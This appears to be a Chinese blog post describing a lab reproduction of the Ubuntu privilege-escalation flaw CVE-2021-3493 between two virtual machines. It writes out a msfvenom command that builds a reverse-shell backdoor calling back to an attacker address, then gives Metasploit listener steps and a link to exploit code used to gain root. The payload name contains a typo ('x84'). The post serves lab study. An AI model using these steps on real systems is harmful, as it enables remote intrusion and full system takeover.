CVE-2021-3493漏洞复现案例(提权)

下面复现需要在虚拟机中完成:

CVE-2021-3493漏洞案例

  • 可以在下面链接下载关于该漏洞的代码脚本
https://github.com/inspiringz/CVE-2021-3493

1、攻击工具及环境说明(在虚拟机上完成)

Ubuntu Kylin(20.04):作为受攻击目标。

 Kali Linux(2021):作为攻击者的攻击平台。

 首先确保两台主机之间的网络连接:确保Ubuntu Kylin和Kali Linux之间可以进行网络通信

2、攻击过程和漏洞利用

 在kali上生成后门脚本文件:参考下面命令(IP地址需要更改)

msfvenom -p linux/x84/meterpreter/reverse_tcp LHOST=192.168.153.152 LPORT=4444 -f elf -o shell.elf


上传后门文件到靶机


进入kali的msf选择对应的模块:

use exploit/multi/handler

设置set payload为 和linux相关

设置LHOST为靶机的地址


运行:run,同时在靶机上运行上传的后门脚本(.elf文件)

在kali上可以监听到靶机:(如图所示)


上传漏洞利用脚本代码和工具

进入shell,ls查看靶机目录下的脚本文件,编译脚本

运行编译生成的文件,同时查看用户信息,获得管理员root管理员权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金铃桃夭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值